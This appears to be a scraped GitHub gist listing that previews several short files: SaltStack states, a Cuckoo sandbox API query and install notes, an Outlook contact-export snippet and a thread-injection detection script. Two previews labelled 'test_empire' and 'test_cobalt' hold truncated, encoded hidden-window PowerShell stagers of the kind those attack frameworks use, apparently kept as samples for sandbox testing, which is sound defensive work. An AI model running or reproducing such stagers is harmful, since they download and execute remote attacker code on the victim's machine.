haam3r

## dokuwiki_unpack.sls
dokuwiki_tar:
  archive.extracted:
    - name: /srv/
    - source: https://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz
    - source_hash: dc00ccb55a4ce2c0dc36d76066a28f4f7541f4b3

{% set dir_path = salt['archive.list']('https://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz')|first %}
dokuwiki_folder_rename:
  file.rename:
    - name: {{ documentroot }}

## mattermost.py
def _get_api_url():
    '''
    Retrieves and return the Mattermost's configured api url
    :return:            String: the api url string
    '''
    #api_url = __salt__['config.get']('mattermost.api_url') or \
    #    __salt__['config.get']('mattermost:api_url')
    #if not api_url:
    #    raise SaltInvocationError('No Mattermost API URL found')

## cuckoo_api.txt
 /tmp  curl http://cuckoo.cert.ee:8090/files/view/md5/d6cf08b4cb84a82784ea0687739e0df6
{
  "sample": {
    "crc32": "211C3296",
    "file_size": 11847,
    "file_type": "ASCII text, with CRLF line terminators",
    "id": 835233,
    "md5": "d6cf08b4cb84a82784ea0687739e0df6",
    "sha1": "e46d97fff5f383ea3929dc44b3272e8d68fbbab6",
    "sha256": "3bcf2db5a3f9d150edbe0ef3a3d76e950406e31efd0067105c0b41636595c252",

## Cuckoo_HW_install.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                haam3r
                / Cuckoo_HW_install.md
            
            
              Last active
              August 18, 2017 09:58
            
          
    #Cuckoo HW base image
For downloading: (New-Object System.Net.WebClient).DownloadFile($url, $output)
List of stuff


Python 2.7.6
KB-s: KB2729094, KB2731771, KB2533623, KB2670838, KB2786081, KB2639308, KB2834140, KB2882822, KB2888049
IE 10
wic


## test_empire
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAcwB0AGUATQAuAE4ARQBUAC4AUwBlAFIAdgBJAGMARQBQAE8AaQBuAFQATQBhAG4AYQBnAGUAUgBdADoAOgBFAHgAUABFAGMAVAAxADAAMABDAG8AbgB0AGkATgB1AEUAIAA9ACAAMAA7ACQAdwBDAD0ATgBFAHcALQBPAEIAagBFAGMAVAAgAFMAeQBTAHQARQBNAC4ATgBlAFQALgBXAEUAYgBDAGwASQBlAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQARQBSAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAHgAWQAgAD0AIABbAFMAeQBTAFQARQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAUQBVAGUAcwBUAF0AOgA6AEQAZQBmAEEAVQBsAHQAVwBlAEIAUAByAG8AeAB5ADsAJABXAGMALgBQAFIAbwBYAFkALgBDAHIARQBEAGUATgB0AGkAYQBsAHMAIAA9ACAAWwBTAFkAcwBUAGUATQAuAE4ARQB0AC4AQwByAEUARABFAG4AVABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABFAEYAYQBVAGwAdABOAEUAVAB3AE8AUgBLAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQASwA9ACcAaABNAFwAKwBsAEYAYQB1ADsAcwAmAD8AQQBnAHwAdgA+AGkAQwBMAF0AZQAyAFUAIwB3AFYAPABeAG4AeQ

## test_cobalt
powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMADEAWABlADIALwBhAHkAaABMAC8ATwAzAHcASwA2AHkAaQBTAGIAUgAzAEMASQA1AEEAMABxAFIAUwBwAEMAOABTAEEAaQB3AG4AQgBQAE0ATgBCAGEAUABFAHUAWgBzAFAAYQBTACsAMAAxAGoANQB6ADIAdQA5ACsAeABNAFMAMgA5AFMAYwAvAE4AVQBhAFcATABaAEcAawBmAE0ANwBNAHoAdgAzAGwAaQBVADMAbABoAHkANABBADUAMABoAEsARQBLAGgAYwBEAEcAbwBSAE0AKwBNAHAAbABKAG4ATgBlAEUAMAAyAHAAMwBDAG0AZgAxAE0AdwBpADgAaAAwAFoASAA4AGUATABtAFUAdgBsAGIAQgAwAEkAWgA0AFkASgBDAFcAZwBZAEsAbgA5AG4AegBqAG8ANAB3AEoANgBpAG4AVwA5AHcATQBQAE0ARQBpAFQAagBOAEsAcwBrAG0ASgBxAFEAawBDAHEAaAArAGQAcABZADUAUwA0ADQAaQBQADgAUQBMAE8AdgBPAHgAWgBCAHMANgA4ADYAaABjAEMAaABMAEMAUQA5AG8ARQByAGQAYwAxADQAVwBIAG0AVAB6ADkAKwByAEUAWgBCAFEASAAxADUAMgBPAGYAcQBWAEsASQB3AHAATgA2AGMATQB4AHAAcQB1AHYASgBWAEcAUwA1AHAAUQBDADgAZQA1AHMALwBVAGsAYwByAGYAeQB2AGsAcwBWACsAZABpAGoAbgBsAEsAdABxADkAaQBaAHcAaw

## Get-InjectedThread.ps1
function Get-InjectedThread
{
    <#

    .SYNOPSIS

    Looks for threads that were created as a result of code injection.

    .DESCRIPTION


## restart_salt_minion.sls
minion_restart_minion:
  cmd.run:
    - name: |
        exec 0>&-
        exec 1>&-
        exec 2>&-
        nohup /bin/sh -c 'sleep 10 && salt-call --local service.restart salt-minion' &
    - order: last

## Get-OutlookContact.ps1
$outlook = new-object -com Outlook.Application -ea 1
$DefaultFolder = $outlook.session.GetDefaultFolder(10)
$DefaultFolder.Items() | Select-Object Email1Address
	dokuwiki_tar:
	archive.extracted:
	- name: /srv/
	- source: https://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz
	- source_hash: dc00ccb55a4ce2c0dc36d76066a28f4f7541f4b3

	{% set dir_path = salt['archive.list']('https://download.dokuwiki.org/src/dokuwiki/dokuwiki-stable.tgz')\|first %}
	dokuwiki_folder_rename:
	file.rename:
	- name: {{ documentroot }}
	def _get_api_url():
	'''
	Retrieves and return the Mattermost's configured api url
	:return: String: the api url string
	'''
	#api_url = __salt__['config.get']('mattermost.api_url') or \
	# __salt__['config.get']('mattermost:api_url')
	#if not api_url:
	# raise SaltInvocationError('No Mattermost API URL found')
	/tmp  curl http://cuckoo.cert.ee:8090/files/view/md5/d6cf08b4cb84a82784ea0687739e0df6
	{
	"sample": {
	"crc32": "211C3296",
	"file_size": 11847,
	"file_type": "ASCII text, with CRLF line terminators",
	"id": 835233,
	"md5": "d6cf08b4cb84a82784ea0687739e0df6",
	"sha1": "e46d97fff5f383ea3929dc44b3272e8d68fbbab6",
	"sha256": "3bcf2db5a3f9d150edbe0ef3a3d76e950406e31efd0067105c0b41636595c252",
	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION
	minion_restart_minion:
	cmd.run:
	- name: \|
	exec 0>&-
	exec 1>&-
	exec 2>&-
	nohup /bin/sh -c 'sleep 10 && salt-call --local service.restart salt-minion' &
	- order: last
	$outlook = new-object -com Outlook.Application -ea 1
	$DefaultFolder = $outlook.session.GetDefaultFolder(10)
	$DefaultFolder.Items() \| Select-Object Email1Address